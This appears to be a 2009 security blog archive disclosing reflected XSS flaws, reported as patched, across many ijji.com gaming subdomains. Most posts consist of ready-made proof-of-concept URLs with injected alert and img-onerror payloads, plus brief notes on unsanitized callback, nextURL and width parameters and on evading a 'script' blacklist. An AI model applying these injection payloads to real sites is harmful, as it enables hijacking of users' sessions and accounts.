Archive for the 'patched' Category

« Older posts

Global Pre-Download [BONUS2]

15 August 2009

Type: Non-persistent
Criteria: None

This final disclosure draws the series of predownload.nhn vulnerabilities to a close.

An actual explaination is due at a later date, where I will wrap this this blog up and open to feedback.

10) Miscellaneous

http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

11) Bulletin Board System

http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

12) Channel

http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

13) Billing

http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

14) HTTPS Billing

https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

15) Facebook

http://facebook.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

16) Message

http://message.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

17) Avatar

http://avatar.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

Posted in patched, x1nixmzeng | Comments Off

Global Pre-Download [BONUS]

14 August 2009

Type: Non-persistent
Criteria: None

The penultimate post in this experimental blog, disclosing 9 seperate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.

1) Top-level

http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

2) www2

http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

3) Huxley:The Dystopia

http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

4) Soldier Front

http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

5) GunZ

http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

6) Drift City

http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

7) Lunia

http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

8) Game

http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

9) Events

http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

This script has a greater advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.

Posted in patched, x1nixmzeng | Comments Off

Login Next URL

11 August 2009

Type: Non-persistent
Criteria: None

http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);//

There is no criteria, as you can be logged in or not – though if you are, you will be logged out (naturally).

In a nutshell, double quotes are encoded, but single ones are not – and also, the nextURL parameter is carelessly outputted straight into a script tag (for the loginENMLoginForm function).

Posted in patched, x1nixmzeng | Comments Off

BBS Forum View

9 August 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&page=&id=999999999&ordering=%22;alert(%27xss%27);//

Note that the exploit will execute twice.

Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the variable id is now very picky about what data has been supplied. However, this exploit will still accept an id which doesn’t yet exist (less data is returned when it doesn’t exist, but this exploit will still work or without a valid id variable).

The XSS relies on the value of ordering, which is blindingly printed into the main page, and in both instances, directly into a SCRIPT tag (the phrase “script” has been blacklisted from all scripts, which is why I’ve been using an alternative).

Posted in patched, x1nixmzeng | Comments Off

Lunia Poll Callback

5 August 2009

Type: Non-persistent
Criteria: None

http://event.ijji.com/poll.nhn?seqid=20090109_watuwantincs_lunia&callback=alert%28%27xss%27%29;//

Posted in patched, x1nixmzeng | Comments Off

JSON Info Callback

2 August 2009

Type: Non-persistent
Criteria: Logged in

http://message.ijji.com/external/personalinfo.nhn?callback=alert(%27xss%27);//

This script returns the number of unread messages and the number of buddies. This is a recent addition to the site, as there was a design overhaul on some sections.

Instead of complaining about the callback variable again, I wish to point out an issue I have with the logic of the content-type header. Valid callback parameters begin with the string:

jsonp

In doing so, the content header is correctly returned (it’s JSON) as text/javascript. However, by simpily removing this text, the result is entirely different – text/html. Hmmph.

Posted in patched, x1nixmzeng | Comments Off

BBS Board View

30 July 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/boardView.nhn?themeName=black&width=alert(String.fromCharCode(120,115,115))

The vulnerability lies entirely within the variable width, which should only accept integer values, and of a restricted size (2-4 digits). The parameter is also pushed directly into a JavaScript eval function, which was dangerous decision.

Posted in patched, x1nixmzeng | Comments Off

JSON Last Login Callback [BONUS]

29 July 2009

Type: Non-persistent
Criteria: None

This post will disclose 5 different subdomains which all use the lastlogin.nhn script to return the last login time for each game. All with the similar trend of the unsanitized callback variable, as seen in many other posts.

Gunz

http://gunz.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Soldier Front

http://sfront.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Lunia

http://lunia.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Drift City

http://drift.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

IJJI’s license for Gunbound expired on July 23rd 2009 (source), but that service was also vulnerable.

Gunbound

http://gunbound.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Posted in patched, x1nixmzeng | Comments Off

Gunz Poll Callback

26 July 2009

Type: Non-persistent
Criteria: None

http://event.ijji.com/poll.nhn?seqid=20080522_Item%20of%20the%20Day%20Poll&callback=alert(%27xss%27);//

Posted in patched, x1nixmzeng | Comments Off

Huxley Poll Callback

25 July 2009

Type: Non-persistent
Criteria: None

http://event.ijji.com/poll.nhn?seqid=20090527_huxleyCBT_poll_3&callback=alert(%27xss%27);//

Posted in patched, x1nixmzeng | Comments Off

« Older posts
Follow

Get every new post delivered to your Inbox.